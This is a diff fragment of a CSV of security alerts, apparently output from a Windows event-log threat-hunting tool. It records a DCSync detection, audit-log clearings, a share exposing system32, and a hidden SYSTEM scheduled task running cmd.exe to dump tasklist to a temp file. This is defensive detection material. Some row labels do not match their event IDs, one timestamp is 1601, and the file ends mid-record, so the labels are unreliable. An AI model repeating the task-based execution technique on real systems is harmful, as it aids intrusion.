+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14675</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.026630Z"">
+    </TimeCreated>
+    <EventRecordID>198242603</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""2868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14674</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Audit log cleared,1552907189.911579,2019-03-18T15:06:29.911579+04:00,,Audit,Critical,schedule task created by user,4698,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4698</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12804</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T00:02:04.319945Z"">
+    </TimeCreated>
+    <EventRecordID>566836</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""2836"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-1587066498-1489273250-1035260531-500</Data>
+    <Data Name=""SubjectUserName"">Administrator</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x17e2d2</Data>
+    <Data Name=""TaskName"">\CYAlyNSS</Data>
+    <Data Name=""TaskContent"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt; 
+&lt;Task version=&quot;1.2&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt; 
+  &lt;Triggers&gt; 
+    &lt;CalendarTrigger&gt; 
+      &lt;StartBoundary&gt;2015-07-15T20:35:13.2757294&lt;/StartBoundary&gt; 
+      &lt;Enabled&gt;true&lt;/Enabled&gt; 
+      &lt;ScheduleByDay&gt; 
+        &lt;DaysInterval&gt;1&lt;/DaysInterval&gt; 
+      &lt;/ScheduleByDay&gt; 
+    &lt;/CalendarTrigger&gt; 
+  &lt;/Triggers&gt; 
+  &lt;Principals&gt; 
+    &lt;Principal id=&quot;LocalSystem&quot;&gt; 
+      &lt;UserId&gt;S-1-5-18&lt;/UserId&gt; 
+      &lt;RunLevel&gt;HighestAvailable&lt;/RunLevel&gt; 
+      &lt;LogonType&gt;InteractiveToken&lt;/LogonType&gt; 
+    &lt;/Principal&gt; 
+  &lt;/Principals&gt; 
+  &lt;Settings&gt; 
+    &lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt; 
+    &lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt; 
+    &lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt; 
+    &lt;AllowHardTerminate&gt;true&lt;/AllowHardTerminate&gt; 
+    &lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt; 
+    &lt;IdleSettings&gt; 
+      &lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt; 
+      &lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt; 
+    &lt;/IdleSettings&gt; 
+    &lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt; 
+    &lt;Enabled&gt;true&lt;/Enabled&gt; 
+    &lt;Hidden&gt;true&lt;/Hidden&gt; 
+    &lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt; 
+    &lt;WakeToRun&gt;false&lt;/WakeToRun&gt; 
+    &lt;ExecutionTimeLimit&gt;P3D&lt;/ExecutionTimeLimit&gt; 
+    &lt;Priority&gt;7&lt;/Priority&gt; 
+  &lt;/Settings&gt; 
+  &lt;Actions Context=&quot;LocalSystem&quot;&gt; 
+    &lt;Exec&gt; 
+      &lt;Command&gt;cmd.exe&lt;/Command&gt; 
+      &lt;Arguments&gt;/C tasklist &amp;gt; %windir%\Temp\CYAlyNSS.tmp 2&amp;gt;&amp;amp;1&lt;/Arguments&gt; 
+    &lt;/Exec&gt; 
+  &lt;/Actions&gt; 
+&lt;/Task&gt;</Data>
+  </EventData>
+</Event>",PC01.example.corp,Security
+schedule task created,1552953724.335561,2019-03-19T04:02:04.335561+04:00,,Audit,High,Audit log cleared by user ( user01 ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T11:06:25.485214Z"">
+    </TimeCreated>
+    <EventRecordID>432901</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""856"" ThreadID=""2200"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-1106</SubjectUserSid>
+      <SubjectUserName>user01</SubjectUserName>
+      <SubjectDomainName>EXAMPLE</SubjectDomainName>
+      <SubjectLogonId>0x18a7875</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",WIN-77LTAPHIQ1R.example.corp,Security
+network share object was added,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,network share object was added,5142,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5142</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12808</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-17T19:30:30.324836Z"">
+    </TimeCreated>
+    <EventRecordID>6273</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""64"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC04.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">PC04</Data>
+    <Data Name=""SubjectLogonId"">0x128a9</Data>
+    <Data Name=""ShareName"">\\*\PRINT</Data>
+    <Data Name=""ShareLocalPath"">c:\windows\system32</Data>
+  </EventData>
+</Event>",PC04.example.corp,Security
+Audit log cleared,1552953724.179623,2019-03-19T04:02:04.179623+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T00:02:00.383090Z"">
+    </TimeCreated>
+    <EventRecordID>566821</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""780"" ThreadID=""3480"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-500</SubjectUserSid>
+      <SubjectUserName>administrator</SubjectUserName>
+      <SubjectDomainName>EXAMPLE</SubjectDomainName>
+      <SubjectLogonId>0x4fd77</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",WIN-77LTAPHIQ1R.example.corp,Security
+Audit log cleared,1552851030.324836,2019-03-17T23:30:30.324836+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-17T19:26:42.116688Z"">
+    </TimeCreated>
+    <EventRecordID>6272</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""792"" ThreadID=""3120"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC04.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-3583694148-1414552638-2922671848-1000</SubjectUserSid>
+      <SubjectUserName>IEUser</SubjectUserName>
+      <SubjectDomainName>PC04</SubjectDomainName>
+      <SubjectLogonId>0x128a9</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",PC04.example.corp,Security
+Audit log cleared,1552951423.570212,2019-03-19T03:23:43.570212+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T23:23:37.147709Z"">
+    </TimeCreated>
+    <EventRecordID>565591</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""780"" ThreadID=""2472"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-500</SubjectUserSid>
+      <SubjectUserName>administrator</SubjectUserName>
+      <SubjectDomainName>EXAMPLE</SubjectDomainName>
+      <SubjectLogonId>0x4fd77</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",WIN-77LTAPHIQ1R.example.corp,Security
+Audit log cleared,1547969410.645116,2019-01-20T11:30:10.645116+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-01-20T07:29:57.863893Z"">
+    </TimeCreated>
+    <EventRecordID>32950</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""736"" ThreadID=""2372"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-500</SubjectUserSid>
+      <SubjectUserName>Administrator</SubjectUserName>
+      <SubjectDomainName>EXAMPLE</SubjectDomainName>
+      <SubjectLogonId>0x35312</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",WIN-77LTAPHIQ1R.example.corp,Security
+Audit log cleared,1547967656.784849,2019-01-20T11:00:56.784849+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-01-20T07:00:50.800225Z"">
+    </TimeCreated>
+    <EventRecordID>32853</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""736"" ThreadID=""1592"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-500</SubjectUserSid>
+      <SubjectUserName>Administrator</SubjectUserName>
+      <SubjectDomainName>EXAMPLE</SubjectDomainName>
+      <SubjectLogonId>0x35312</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",WIN-77LTAPHIQ1R.example.corp,Security
+Audit log cleared,1600193079.987052,2020-09-15T22:04:39.987052+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T18:04:36.333991Z"">
+    </TimeCreated>
+    <EventRecordID>161471</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1276"" ThreadID=""6720"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-3461203602-4096304019-2269080069-1000</SubjectUserSid>
+      <SubjectUserName>IEUser</SubjectUserName>
+      <SubjectDomainName>MSEDGEWIN10</SubjectDomainName>
+      <SubjectLogonId>0x52a7d</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",MSEDGEWIN10,Security
+Audit log cleared,1552908425.42562,2019-03-18T15:27:05.425620+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
